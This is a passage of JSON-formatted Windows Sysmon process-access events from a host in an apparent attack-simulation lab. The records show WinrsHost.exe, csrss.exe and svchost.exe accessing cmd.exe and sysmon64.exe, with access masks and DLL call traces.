05:52:46.062","SourceProcessGUID":"{A837DB8D-032E-5F25-0000-0010FC520A00}","SourceProcessId":"3396","SourceThreadId":"3256","SourceImage":"C:\\Windows\\system32\\WinrsHost.exe","TargetProcessGUID":"{A837DB8D-032E-5F25-0000-0010B8550A00}","TargetProcessId":"4324","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\WinrsHost.exe+2c94|C:\\Windows\\system32\\WinrsHost.exe+2eb1|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5371,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.062\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-032E-5F25-0000-0010B8550A00}\r\nTargetProcessId: 4324\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.062","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-032E-5F25-0000-0010B8550A00}","TargetProcessId":"4324","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5372,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.062\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.062","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5373,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.062\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.062","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5374,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.062\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.062","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5375,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.062\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.062","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5376,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.062\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.062","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5377,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.062\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.062","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5378,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.062\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.062","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
